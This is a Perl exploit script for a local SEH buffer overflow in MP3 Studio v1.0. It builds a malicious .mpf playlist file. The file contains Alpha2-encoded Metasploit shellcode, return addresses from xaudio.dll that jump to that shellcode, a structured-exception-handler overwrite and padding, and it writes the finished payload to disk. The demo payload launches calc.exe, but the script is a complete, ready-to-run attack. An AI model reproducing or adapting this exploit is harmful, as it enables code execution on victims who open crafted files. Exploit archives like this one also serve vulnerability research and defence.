#!/usr/bin/perl # # MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH) # Exploited by: Koshi # Download: http://www.software112.com/products/mp3-millennium+download.html # Based on PoC/findings by HACK4LOVE ( http://milw0rm.com/exploits/9277 ) # Tested on WinXP SP3 # # I've used addresses from "xuadio.dll", which is shipped with the package. # # win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66". "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32". "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d". "\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c". "\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67". "\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74". "\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b". "\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b". "\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d". "\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56". "\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55". "\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59". "\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b". "\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47". "\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b". "\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51". "\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f". "\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55". "\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71". "\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75". "\x50\x66"; my $jmpe = "\x3f\x5e\x03\x10"; # 0x10035E3F jmp esp (xaudio.dll) my $nseh = "\xeb\xf1\x90\x90"; # Get back to where we once belong. my $eseh = "\xfd\x61\x03\x10"; # 0x100361FD jmp edi (xaudio.dll) my $phun = "\x33\xc0\x33\x45\xf8\x04\x05\xff\xe0"; # # XOR EAX,EAX # XOR EAX,DWORD PTR SS:[EBP-8] # ADD AL,5 # JMP EAX # my $leng = 4103 - length($shellcode) - length($phun); my $buff = "\x41"x$leng; my $tuff = "http:".$buff.$shellcode.$phun.$jmpe.$nseh.$eseh; open (MYFILE, '>>exploit.mpf'); print MYFILE "$tuff"; close (MYFILE); print "Exploit file has been created. ( exploit.mpf )\n";